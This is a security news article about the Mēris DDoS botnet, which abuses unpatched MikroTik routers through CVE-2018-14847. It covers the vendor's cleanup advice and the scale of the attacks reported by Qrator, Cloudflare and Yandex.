Mēris: How to Stop the Most Powerful Botnet on RecordMicroTik Flaws Still Being Exploited, But There Are Mitigation Steps
The Mēris botnet, responsible for huge waves of distributed denial-of-service attacks recorded by cybersecurity firms Qrator Labs and Cloudflare, is still active, using "abandoned" MikroTik routers running a vulnerable version of MikroTik RouterOS. The botnet recently came to prominence after being deployed in what the Russian media describes as the "largest distributed denial-of-service attack in the history of the Runet." The Runet is the Russian internet.
The botnet has been targeting internet service providers, financial entities, large e-commerce companies and even some smaller targets, including the website of cybersecurity journalist Brian Krebs, who runs the news blog KrebsOnSecurity.
The majority of these attacks came from attacking hosts located in Brazil (10.9%), Indonesia (10.9%) and India (5.9%), and most of them resulted from vulnerable versions of MikroTik RouterOS, Qrator Labs' researchers report.
Reiterating Qrator's findings, Patrick Donahue, director of product at Cloudflare, told news site The Daily Swig that the "attack we saw ... was almost entirely composed of MikroTik devices."
Still a Threat
The MikroTik manufacturer, based in Latvia, had issued a fix in April 2018 for a vulnerability designated as CVE-2018-14847 (see: MikroTik Routers Targeted in Data Eavesdropping Scheme).
At the time, MicroTik advised users to immediately upgrade their Winbox and RouterOS, change passwords, add firewall to the Winbox port from the public interface and untrustworthy networks, and look out for any abnormalities, such as unknown SOCKS proxy settings and scripts.
But only 30% of these vulnerable devices were patched successfully - which means that approximately 200,000 routers are still vulnerable, news platform Threatpost says, citing a report from cybersecurity company Tenable.
In addition, Alexander Lyamin, founder and CEO of Qrator Labs, tells ISMG that the Mēris botnet is still being leveraged in an ongoing attack, although there has been a sharp decline in its volume in the past few weeks.
When contacted by Information Security Media Group, MikroTik said that currently there is not much that it can do as the vulnerability being exploited in its devices today - CVE-2018-14847 - is from three years ago and a fix for it was issued at that time. It adds that this update requires a physical connection to the vulnerable devices, which means, "We can do nothing about completely abandoned devices where somebody has plugged in and left it alone."
Initially, this looked like a dead end for controlling the spread and abuse of MikroTik devices being used in the propagation of the Mēris botnet, but a detour does exist, MikroTik suggests in a recently released security blog.
Taming the Mēris Monster
To remove compromised MikroTik devices from the Mēris botnet, MikroTik recommends monitoring and removal of the following configuration:
- Remove the System Scheduler rules that execute a Fetch script.
- If you do not use the IP Socks proxy or do not know what it does, disable it. It is being used by Mēris to monitor and multiply botnet traffic.
- Remove Layer 2 Tunneling Protocol (L2TP) client named "lvpn" or any L2TP client that you do not recognize. Yandex's researchers have found Mēris botnet abusing this protocol.
- Disable the input firewall rule that allows access for port 5678. This open is the reason why these devices got hacked unnoticed by their owners, Qrator's researchers say. Attackers used standard services associated to this port as a disguise during the attack.
All MikroTik devices have default admin login credentials of Username: admin and Password: blank (empty field). Lyamin tells ISMG, "[This] is a good reason why the industry has tried to abandon password authentication in past [few] years. Poor password practices is a real problem in the info security world nowadays."
MikroTik recognizes this default password issue and says it is working toward fixing it. Currently, however, the only remediation available is changing the default credentials. As a good practice, MicroTik recommends that everyone - even those who have changed default credentials - change their passwords.
Apart from immediate patching, firewall setup and changing of passwords, MikroTik suggests blocking the 40 addresses or domains with which the malicious scripts of the botnet are associated. Check the complete list at the end of MikroTik's security blog.
Lyamin supports this strategy, saying, "We have actively communicated [this strategy] with a number of ISPs and hosting companies around the world to suppress the activity of this botnet. It turned out to be quite an effective strategy since in the past week the total number of active bots decreased to mere thousands."
MikroTik told ISMG that its greatest challenge in executing the entire remediation process is that, "MikroTik sells only to wholesalers and large distributors. We have no registration process for end-users, and we don't sell to them directly. This means we can only reach out to our distributors and our end users through our social media accounts. Distributors … sell these units in street shops, without requiring any contact information. This means there are many devices where nobody knows who is using it."
Qrator researchers add that since the attacks were not spoofed, every victim sees the attack origin as it is. "Blocking it for a while should be enough to thwart the attack and not disturb the possible end user," it says.
MikroTik Warned Earlier
Unfortunately, even those who patched when the vulnerability was first discovered in 2018 are not necessarily safe. "If somebody got your password in 2018, just an upgrade will not help. You must also change your password and apply firewall rules for the traffic coming in from the open internet," MikroTik tells ISMG.
"Most of these devices are not managed by anyone. The above solution (or any solution) requires a user to connect to the device and press a button to upgrade, or a button to clean the configuration. We don't have any remote access to our products and can't do anything without user consent," MicroTik says.
Users on a MikroTik forum add, "One of the many problems [with this procedure] is that many routers are at remote locations and netinstall only works locally. Some are high up in tower or roof tops etc."
MikroTik explains to ISMG that although it "tried to reach all users of RouterOS about this, many have never been in contact with MikroTik and are not actively monitoring their devices." The company added: "We will [soon] add an option in our router management apps, that if malicious configuration is detected, users will be alerted, and [we will] offer to automatically clean the malicious configuration. This though does require somebody to connect to the router [physically]."
"As far as we know, right now there are no new vulnerabilities in these devices and the RouterOS has been recently independently audited by several contractors," the company tells ISMG.
The Rise and Spread of Mēris
Qrator's team collaborated with Russian search engine Yandex so that the botnet's activity could be monitored in almost real time.
Yandex's observations helped in plotting the spike in attacks that increased gradually each day:
- Aug.7, 2021- 5.2 million rps;
- Aug. 9, 2021- 6.5 million rps;
- Aug. 29, 2021- 9.6 million rps;
- Aug. 31, 2021- 10.9 million rps;
- Sept. 5, 2021 - 21.8 million rps.
Qrator says more than 30,000 host devices used in the attack were taken over by the Mēris botnet. Yandex confirmed that its servers were pummeled with nearly 56,000 attacking hosts targeting its servers and likely compromised over 250,000 devices, reports Threatpost.
Lyamin tells ISMG, "Mēris can now be rented out through Telegram channels … the group behind it has recently announced a discount program and is offering services starting from $80 per hour." This means another wave is coming soon or the botnet is being leveraged in other attack types and vectors, he says.
Confirming the popularity of this botnet, cyber threat intelligence company Kela tweeted that the admin of the Lockbit ransomware group is looking for the botnet's operators.